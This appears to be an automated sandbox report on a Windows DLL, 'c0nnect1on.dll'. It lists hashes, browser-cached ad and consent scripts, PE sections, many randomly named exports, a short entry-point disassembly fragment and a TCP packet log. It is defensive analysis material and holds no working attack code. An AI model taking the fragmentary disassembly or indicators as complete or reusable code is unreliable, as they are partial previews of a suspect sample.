SSDEEP:	6144:lkaVC2N85vb2H0m943GNVoTgz5aCuJbPqU21fij:lW5vye3GNVoTg8xpPqU21fij
MD5:	B34EDCDDDD14A30C728E519B8D71BC66
SHA1:	36F434E5C7FC2CB7115322E5677446E1B0769A4F
SHA-256:	9E0BEF4868A2F092AA26AC99631A944834ECAF1C5C78324AC119B9BA2CE6CE5D
SHA-512:	B01C02D367E018717534C6A375D1DC0DD136972403CFF35B1040B453D454A06B386852F6C8FC82C82689A0C970E4D12A2A3D82928C21B94375652AD9F859FC05
Malicious:	false
IE Cache URL:	https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";function e(e){"object"==typeof e&&(p=e)}function n(e){g=e}function t(e){m=e}function o(e){d=e}function r(e){"undefined"==typeof e.logLevel&&(e={logLevel:3,errorVal:e}),e.logLevel>=3&&w[e.logLevel-1].push(e)}function i(){var e,n=0;for(e=0;e<v;e++)n+=w[e].length;if(0!==n){var t,o,r,i,s=new Image,a=p.lurl?p.lurl:"https://lg3-a.akamaihd.net/nerrping.php",f="",c=0;for(e=v-1;e>=0;e--){for(n=w[e].length,t=0;t<n;){if(i=1===e?w[e][t]:{logLevel:w[e][t].logLevel,errorVal:{name:w[e][t].errorVal.name,type:g,svr:m,servname:d,message:w[e][t].errorVal.message,line:w[e][t].errorVal.lineNumber,description:w[e][t].errorVal.description,stack:w[e][t].errorVal.stack}},r=l(i),!(r.length+f.length<=1200)&&f.length){c=1;break}0!==f.length&&(f+=","),f+=r,w[e].shift(),n--

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\medianet[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	384111
Entropy (8bit):	5.483708210483615
Encrypted:	false
SSDEEP:	6144:lkaVC2N85vb2H0m943GNVoTgz5aCuJbPqU21fij:lW5vye3GNVoTg8xpPqU21fij
MD5:	97A3C6E4FA42A2B818B432ADEC962C8A
SHA1:	D2A931EE3754814EE285783B713938694061EFDB
SHA-256:	CE2FF89A1B50C68B0F31CED9307E2320F568D7C4BF97BEA0F0BA0CF05DAA5C64
SHA-512:	18D48F023848706626EEAFCC056EABB484E1CEFDE803FBE3A93480D68E8610EE557F97B8C175BDEDDC570CF0AA93C41A212134B8FAA7E9EB75BA02DDC16C0925
Malicious:	false
IE Cache URL:	https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Preview:	<html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs\|\|{},window.mnjs.ERP=window.mnjs.ERP\|\|function(){"use strict";function e(e){"object"==typeof e&&(p=e)}function n(e){g=e}function t(e){m=e}function o(e){d=e}function r(e){"undefined"==typeof e.logLevel&&(e={logLevel:3,errorVal:e}),e.logLevel>=3&&w[e.logLevel-1].push(e)}function i(){var e,n=0;for(e=0;e<v;e++)n+=w[e].length;if(0!==n){var t,o,r,i,s=new Image,a=p.lurl?p.lurl:"https://lg3-a.akamaihd.net/nerrping.php",f="",c=0;for(e=v-1;e>=0;e--){for(n=w[e].length,t=0;t<n;){if(i=1===e?w[e][t]:{logLevel:w[e][t].logLevel,errorVal:{name:w[e][t].errorVal.name,type:g,svr:m,servname:d,message:w[e][t].errorVal.message,line:w[e][t].errorVal.lineNumber,description:w[e][t].errorVal.description,stack:w[e][t].errorVal.stack}},r=l(i),!(r.length+f.length<=1200)&&f.length){c=1;break}0!==f.length&&(f+=","),f+=r,w[e].shift(),n--

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\otBannerSdk[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	372457
Entropy (8bit):	5.219562494722367
Encrypted:	false
SSDEEP:	6144:B0C8zZ5OVNeBNWabo7QtD+nKmbHgtTVfwBSh:B4zj7BNWaRfh
MD5:	DA186E696CD78BC57C0854179AE8704A
SHA1:	03FCF360CC8D29A6D63BE8073D0E52FFC2BDDB21
SHA-256:	F10DC8CE932F150F2DB28639CF9119144AE979F8209E0AC37BB98D30F6FB718F
SHA-512:	4DE19D4040E28177FD995D56993FFACB9A2A0A7AAB8265BD1BBC7400C565BC73CD61B916D23228496515C237EEA14CCC46839F507879F67BA510D97F46B63557
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk.js
Preview:	/** .. * onetrust-banner-sdk.. * v6.7.0.. * by OneTrust LLC.. * Copyright 2020 .. */..!function () { "use strict"; var o = function (e, t) { return (o = Object.setPrototypeOf \|\| { __proto__: [] } instanceof Array && function (e, t) { e.__proto__ = t } \|\| function (e, t) { for (var o in t) t.hasOwnProperty(o) && (e[o] = t[o]) })(e, t) }; var r = function () { return (r = Object.assign \|\| function (e) { for (var t, o = 1, n = arguments.length; o < n; o++)for (var r in t = arguments[o]) Object.prototype.hasOwnProperty.call(t, r) && (e[r] = t[r]); return e }).apply(this, arguments) }; function l(s, i, a, l) { return new (a = a \|\| Promise)(function (e, t) { function o(e) { try { r(l.next(e)) } catch (e) { t(e) } } function n(e) { try { r(l.throw(e)) } catch (e) { t(e) } } function r(t) { t.done ? e(t.value) : new a(function (e) { e(t.value) }).then(o, n) } r((l = l.apply(s, i \|\| [])).next()) }) } function k(o, n) { var r, s, i, e, a = { label: 0, sent: function () { if (1 & i[0]) throw i[1]

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\otFlat[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	12588
Entropy (8bit):	5.376121346695897
Encrypted:	false
SSDEEP:	192:RtmLMzybpgtNs5YdGgDaRBYw6Q3gRUJ+q5iwJlLd+JmMqEb5mfPPenUpoQuQJ/Qq:RgI14jbK3e85csXf+oH6iAHyP1MJAk
MD5:	AF6480CC2AD894E536028F3FDB3633D7
SHA1:	EA42290413E2E9E0B2647284C4BC03742C9F9048
SHA-256:	CA4F7CE0B724E12425B84184E4F5B554F10F642EE7C4BE4D58468D8DED312183
SHA-512:	A970B401FE569BF10288E1BCDAA1AF163E827258ED0D7C60E25E2D095C6A5363ECAE37505316CF22716D02C180CB13995FA808000A5BD462252F872197F4CE9B
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/otFlat.json
Preview:	.. {.. "name": "otFlat",.. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxhdCI+PGRpdiBjbGFzcz0ib3Qtc2RrLWNvbnRhaW5lciI+PGRpdiBjbGFzcz0ib3Qtc2RrLXJvdyI+PGRpdiBpZD0ib25ldHJ1c3QtZ3JvdXAtY29udGFpbmVyIiBjbGFzcz0ib3Qtc2RrLWVpZ2h0IG90LXNkay1jb2x1bW5zIj48ZGl2IGNsYXNzPSJiYW5uZXJfbG9nbyI+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtcG9saWN5Ij48aDMgaWQ9Im9uZXRydXN0LXBvbGljeS10aXRsZSI+VGhpcyBzaXRlIHVzZXMgY29va2llczwvaDM+PCEtLSBNb2JpbGUgQ2xvc2UgQnV0dG9uIC0tPjxkaXYgaWQ9Im9uZXRydXN0LWNsb3NlLWJ0bi1jb250YWluZXItbW9iaWxlIiBjbGFzcz0ib3QtaGlkZS1sYXJnZSI+PGJ1dHRvbiBjbGFzcz0ib25ldHJ1c3QtY2xvc2UtYnRuLWhhbmRsZXIgb25ldHJ1c3QtY2xvc2UtYnRuLXVpIGJhbm5lci1jbG9zZS1idXR0b24gb3QtbW9iaWxlIG90LWNsb3NlLWljb24iIGFyaWEtbGFiZWw9IkNsb3NlIEJhbm5lciIgdGFiaW5kZXg9IjAiPjwvYnV0dG9uPjwvZGl2PjwhLS0gTW9iaWxlIENsb3NlIEJ1dHRvbiBFTkQtLT48cCBpZD0ib25ldHJ1c3QtcG9saWN5LXRleHQiPldlIHVzZSBjb29raWVzIHRvIGltcHJvdmUgeW91ciBleHBlcmllbmNlLCB0byByZW1lbWJlciBsb2ctaW4gZGV0YWlscywgcHJvdmlkZSBzZWN1cmUgbG9

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\otSDKStub[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	12814
Entropy (8bit):	5.302802185296012
Encrypted:	false
SSDEEP:	192:pQp/Oc/tyWocJgjgh7kjj3Uz5BpHfkmZqWov:+RbJgjjjaXHfkmvov
MD5:	EACEA3C30F1EDAD40E3653FD20EC3053
SHA1:	3B4B08F838365110B74350EBC1BEE69712209A3B
SHA-256:	58B01E9997EA3202D807141C4C682BCCC2063379D42414A9EBCCA0545DC97918
SHA-512:	6E30018933A65EE19E0C5479A76053DE91E5C905DA800DFA7D0DB2475C9766B632F91DE8CC9BD6B90C2FBC4861B50879811EE43D465E5C5434943586B1CC47F1
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.js
Preview:	var OneTrustStub=function(t){"use strict";var l=new function(){this.optanonCookieName="OptanonConsent",this.optanonHtmlGroupData=[],this.optanonHostData=[],this.IABCookieValue="",this.oneTrustIABCookieName="eupubconsent",this.oneTrustIsIABCrossConsentEnableParam="isIABGlobal",this.isStubReady=!0,this.geolocationCookiesParam="geolocation",this.EUCOUNTRIES=["BE","BG","CZ","DK","DE","EE","IE","GR","ES","FR","IT","CY","LV","LT","LU","HU","MT","NL","AT","PL","PT","RO","SI","SK","FI","SE","GB","HR","LI","NO","IS"],this.stubFileName="otSDKStub",this.DATAFILEATTRIBUTE="data-domain-script",this.bannerScriptName="otBannerSdk.js",this.mobileOnlineURL=[],this.isMigratedURL=!1,this.migratedCCTID="[[OldCCTID]]",this.migratedDomainId="[[NewDomainId]]",this.userLocation={country:"",state:""}},e=(i.prototype.initConsentSDK=function(){this.initCustomEventPolyfill(),this.ensureHtmlGroupDataInitialised(),this.updateGtmMacros(),this.fetchBannerSDKDependency()},i.prototype.fetchBannerSDKDependency=function(

C:\Users\user\AppData\Local\Temp\~DF1C1664AB589E59B3.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13557
Entropy (8bit):	0.7635350569212692
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loNx9loNR9lWNO+m+3C5dBYMYa+WYaJYEYY+WYYAkYx:kBqoII2rJS5MjDX
MD5:	4FED9556F4A36344EEE2BFD2FE254417
SHA1:	1C9BD8982F2E096C0B5F94D306CFDAF6653789CB
SHA-256:	725C96EC4131B3EBB80DF2026638380324333B4FB997A57155F07B8AF8ADB89F
SHA-512:	B8F9A7338614405581C1C9CAA28E44FD8F018CFC5D0B552B354A378B306A7E3EB7BB7E28FEEC8B88067ECF8D10950384F8F5D8650874A56AC2246839339E40A4
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF20D3CCA52FE502B9.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39489
Entropy (8bit):	0.5410029501821543
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+kCo5i0g8GUug8GUmg8GU/:kBqoxKAuqR+kCo5i0gzUugzUmgzU/
MD5:	2D6A7ADB9B39ACA9F8AFD25E7AE235F6
SHA1:	78A95497B84A169D5907B82EA3757ACF4F9328BC
SHA-256:	85D00BE817C02B77A6ACA142F56B0248D6CE1BC74734E4A6029A2B13ACF0777F
SHA-512:	8A05116EEE8D712B0F65D1D71E05BA5F5F2AD6D9ED88630D9786F3A20C1FF909E09F7E53B82BD0042EDA32BD52036BC5C17D8DA9E4D3FF14326D12BA001BE701
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF56ED9DD5F566E12C.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	29989
Entropy (8bit):	0.33019089230975535
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lw/9lw/9l2Z/9l2h9la4:kBqoxKAuvScS+4+Z+4Zy
MD5:	20DDEEBE6DB2D3DDE5ECD4A19BF607AA
SHA1:	9C46BB302765ACDCE40B563093E130D9D22E207F
SHA-256:	59ECB7750B3C6CF57FEFEB8EBC1BF9E815883684C7AF659A3A45FF3A3684B956
SHA-512:	7EF68407B632F944A1FFAAC7C55B306924DD126422656B04BF34E60EE016ACBB46C91CE67392E5BCA5E69602B79E20EAC5B4BF1D62418C15AB923F1EF5D7EE6E
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF61CB16FB817E4404.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	191268
Entropy (8bit):	3.1462795817074185
Encrypted:	false
SSDEEP:	3072:liqZ/2Bfc6ru5rXfVStmiqZ/2BfcJru5rXfVSt:Uh
MD5:	2572B834F4A29ED24983081150ED0652
SHA1:	47C00AEE950001186A45D7F3A40C2E0F440B575E
SHA-256:	496CD2C46EE23E6BE7CA7E1D659107879283D443ECFD7205A300D179B98F7C87
SHA-512:	9A5871F874D88FED618683CA7DE739BB024EA7E12F393633CAB0CBCC649B081C0CC0FDFCF0AA05831B8B229238906C3054ACE833D8155D5CB5FD26CD4BD312C8
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5F8WADEG4TSNS95EQCFX.temp Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	modified
Size (bytes):	5149
Entropy (8bit):	3.192699136878435
Encrypted:	false
SSDEEP:	48:audiCPuIUuC9GrIoUAsASFdudiCPuIUuh683GrIoUAczQudiCPuIUux9GrIoUAVt:9PuJ39S0AJxPuJs3S0AYPuJw9S0Af
MD5:	F00CD922273821FE52F637E324F0EFFA
SHA1:	9FDC24359C896FF35DF31F65169A018B833348D3
SHA-256:	BF8364D44D3DC78864E83F8CD510C719DAA8656687D784A1EBCF007A05C8A8AC
SHA-512:	774C97B94D8904A7E0E5750DA16D757E7EF95243A0CA1894B81E01A8D6870D04779E631A8BF73697967F103C85C09F1E9C26B233089ADAAF03971E51E37B3C10
Malicious:	false
Preview:	...................................FL..................F.@.. .....@.>............?.c................................P.O. .:i.....+00.../C:\.....................1.....>Qb{..PROGRA~1..t......L.>Qb{....E...............J......b?.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....l.1......L.J..INTERN~1..T......L.wQ%...............................i.n.t.e.r.n.e.t. .e.x.p.l.o.r.e.r.....f.2......L.9 .iexplore.exe..J......L.JwQ%......R..........x.............i.e.x.p.l.o.r.e...e.x.e.......^...............-.......]....................C:\Program Files\internet explorer\iexplore.exe....-.p.r.i.v.a.t.e...C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.I.E.F.R.A.M.E...d.l.l.........%SystemRoot%\SYSTEM32\IEFRAME.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.Y.S.T.E.M.3.2.\.I

Static File Info

General
File type:	MS-DOS executable, MZ for MS-DOS
Entropy (8bit):	6.572203615040463
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	c0nnect1on.dll
File size:	208368
MD5:	20a56ccc52baa83bb0dcf3ef56035f6e
SHA1:	9c676a87f45a729814803eba55afde7653f8f1d0
SHA256:	e33157d0b5973fb880934006b1427f5ad53ae3f471e81a9a8460772d7f5b3657
SHA512:	ded18630680f5808840e1f26a73fac5e9479c65114cdf0b14968820a7f0844e0948f9a43289a1d008ac4758ff2592c75ed7933666d00fb8d4fbc3f5d27955fa7
SSDEEP:	6144:D9XUUA9IHBLmpsHvkgFZEhKHKRL8HE3RO0:9UUA9IH5m6HsgFpWthO0
File Content Preview:	MZ......................................................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.................`............@.................................g......................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x406009
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e510a197248acc9c6e9a54148c21bfcc

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 24h
push esi
call dword ptr [0040193Ch]
mov dword ptr [ebp-10h], eax
mov dword ptr [0041C480h], 0000002Bh
push dword ptr [0041C45Ch]
push eax
push 0000000Bh
push 00000018h
push 0000006Bh
call 00007FC148957B28h
mov edi, 1B447FEBh
mov dword ptr [ebp-20h], edi
sub dword ptr [0041C480h], 00000001h
cmp dword ptr [0041C480h], 00000000h
jne 00007FC1489573F2h
push 0000006Bh
push FFFFFFE2h
push 00000000h
call 00007FC148957904h
add esp, 0Ch
mov dword ptr [ebp-14h], eax
jmp 00007FC14895582Fh
add ecx, ebx
mov esi, dword ptr [esp+14h]
push ebp
mov ebp, esp
sub esp, 20h
push edx
push esi
push 0000003Eh
push 00000022h
push 00000076h
push dword ptr [ebp+10h]
call 00007FC148954089h
mov dword ptr [ebp-0Ch], eax
mov esi, 0000000Ch
xor esi, dword ptr [0041BD3Ch]
add esi, dword ptr [ebp+14h]
mov dword ptr [ebp-1Ch], esi
push dword ptr [0041BD3Ch]
push dword ptr [0041BD3Ch]
call 00007FC14895732Dh
add esp, 08h
mov edx, eax
mov dword ptr [ebp+0Ch], edx
push 0041BB40h
push 0000007Fh
push 00000071h
push 00000000h
call dword ptr [00401940h]
cmp eax, 00000000h
jne 00007FC148953E4Dh
mov dword ptr [00000000h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1288	0xac8	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d000	0x64	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x32a00	0x3f0	.bu
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3e000	0x684	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x12b0	0xa8	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1938	0x40	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6043	0x6200	False	0.651546556122	data	6.66460329213	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1c989	0x14600	False	0.666854390337	data	5.54193891222	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.s	0x25000	0x5a9b	0x5c00	False	0.654254415761	data	6.39224864021	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.ped	0x2b000	0x591b	0x5a00	False	0.659548611111	data	6.41099706342	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bu	0x31000	0x5760	0x5800	False	0.661088423295	data	6.41829681133	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bigg	0x37000	0x5846	0x5a00	False	0.647222222222	data	6.35880983726	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3d000	0x1ba	0x200	False	0.544921875	data	4.16881597049	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3e000	0x684	0x800	False	0.72021484375	data	6.07057074027	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
kernel32.dll	GetCurrentProcessId, GetCurrentThreadId, VirtualProtect, GetTickCount, QueryPerformanceCounter
mciqtz32.dll	DriverProc
snmpapi.dll	SnmpUtilOidFree, SnmpUtilOidAppend, SnmpUtilOidCpy, SnmpUtilOidCmp
user32.dll	CreateWindowExW, SetWindowPos

Exports

Name	Ordinal	Address
Tetrapteron	1	0x402a34
Ductilimeter	2	0x402a82
Bisext	3	0x402b2b
Acropathy	4	0x402bb6
Mormyrid	5	0x402ca5
Cypressed	6	0x402ce9
Sorbinose	7	0x402e19
Ceramiaceae	8	0x402ef2
Fanciable	9	0x402f1c
Acyetic	10	0x402f93
Allotropicity	11	0x402fe1
Ambuscader	12	0x403094
Dyotheletian	13	0x403130
Uncorrigibleness	14	0x40319a
Lather	15	0x4031db
Byzantinism	16	0x40324a
Bryanthus	17	0x403274
Unoverhauled	18	0x4032b9
Peculium	19	0x403305
Turritella	20	0x4033bf
Medrick	21	0x403452
Satinize	22	0x4034c2
Ophiologic	23	0x4034fe
Iddio	24	0x403578
Enterotoxication	25	0x40360e
Adonize	26	0x40368c
Arrowlike	27	0x403724
Truckle	28	0x403766
Scabellum	29	0x4037d0
Reviviscible	30	0x40383c
Preballoting	31	0x4039e5
Birle	32	0x403a89
Pennill	33	0x403ad7
Shielded	34	0x403baf
Electricalize	35	0x403be5
Tundagslatta	36	0x403d02
Gingili	37	0x403dbb
Redistinguish	38	0x403e16
Overinventoried	39	0x403e89
Dagassa	40	0x403ee3
Lipography	41	0x403f7f
Pandion	42	0x404053
Unprince	43	0x4040a3
Bondar	44	0x4040f9
Attraction	45	0x404143
Protopresbytery	46	0x4042bf
Stovewood	47	0x40435d
Campshedding	48	0x40438d
DllUnregisterServer	49	0x4043ee
Trogue	50	0x40441d
Undersaturation	51	0x404518
Unmovingly	52	0x40455b
Deseret	53	0x4045ee
Degradedness	54	0x4046f9
Metapolitics	55	0x404749
Tastily	56	0x40478b
Glaucionetta	57	0x4047e7
Happify	58	0x4048b1
Rombowline	59	0x404912
Unchristened	60	0x4049b2
Vacillator	61	0x404a1a
Expressionism	62	0x404a49
Uveal	63	0x404aab
Fustin	64	0x404b6d
Outbeg	65	0x404bc1
Foreshape	66	0x404c60
Teleologism	67	0x404ca3
Tenderling	68	0x404cf4
Limnanthes	69	0x404d20
Nubilate	70	0x404d5f
Petaloid	71	0x404ddd
Coinstantaneousness	72	0x404ed6
Impersuasible	73	0x404f1d
Outsentry	74	0x404f5f
Ephebic	75	0x404ffe
Ostyak	76	0x40507f
Urosepsis	77	0x4050e3
Osteolite	78	0x4051cc
Unembezzled	79	0x405242
Trimercuric	80	0x405284
Unringed	81	0x4052cb
Jeweling	82	0x405363
Throughganging	83	0x4053c8
Dracontites	84	0x405452
Prompter	85	0x4055a9
Flysch	86	0x405688
Disobligingness	87	0x40573c
Sturnine	88	0x4057a1
Sugamo	89	0x40580e
Outsheathe	90	0x40589e
Sherryvallies	91	0x405943
Cystoadenoma	92	0x40596a
Bewitchful	93	0x405a91
Nimbification	94	0x405b60
Aerobically	95	0x405bb4
Thema	96	0x405cd6
Nontransparency	97	0x405dbb
DllCanUnloadNow	98	0x405e97
Hematohidrosis	99	0x405efc
Overslavish	100	0x405fb2
Manyberry	101	0x406009
Pseudoimpartial	102	0x40606f
Fireshine	103	0x4060e3
Nonaerating	104	0x406125
Paragnathus	105	0x406182
Homostylous	106	0x4061d5
Finnesko	107	0x40626f
Portugalism	108	0x4062ff
Folkmoter	109	0x406372
Sterhydraulic	110	0x4063ad
Chalcis	111	0x406401
Beghard	112	0x40646a
Ironbark	113	0x40653d
Onoclea	114	0x40663c
Hydroponics	115	0x406738
DllGetClassObject	116	0x40686a
Gentilesse	117	0x4068a4
Noetic	118	0x40691a
Mikadoism	119	0x4069a0
Circumparallelogram	120	0x406a34
Purdah	121	0x406a6b
Aptenodytes	122	0x406ad7
DllRegisterServer	123	0x406b4a
Unifiedness	124	0x406b96
Denominationally	125	0x406c7d
Uptilt	126	0x406ccc
Recarbonization	127	0x406d2b
Myoneuralgia	128	0x406e08
Hypnophobic	129	0x406e7d
Idler	130	0x406f53

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2020 10:01:17.860469103 CET	49744	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.862462997 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.871284008 CET	49746	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.871490955 CET	49747	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.871735096 CET	49748	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.871880054 CET	49749	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.879656076 CET	443	49744	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.879760027 CET	49744	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.881484032 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.881596088 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.888133049 CET	49750	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:17.890382051 CET	443	49746	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.890491009 CET	49746	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.890652895 CET	443	49747	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.890686989 CET	49744	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.890687943 CET	443	49748	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.890690088 CET	49751	443	192.168.2.6	87.248.118.22
Nov 23, 2020 10:01:17.890737057 CET	49747	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.890778065 CET	49748	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.890822887 CET	443	49749	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.890913010 CET	49749	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.891349077 CET	49745	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.892771959 CET	49748	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.893003941 CET	49746	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.895648003 CET	49747	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.895853043 CET	49749	443	192.168.2.6	151.101.1.44
Nov 23, 2020 10:01:17.909694910 CET	443	49744	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.910260916 CET	443	49745	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.910937071 CET	443	49744	151.101.1.44	192.168.2.6
Nov 23, 2020 10:01:17.910980940 CET	443	49744	151.101.1.44	192.168.2.6
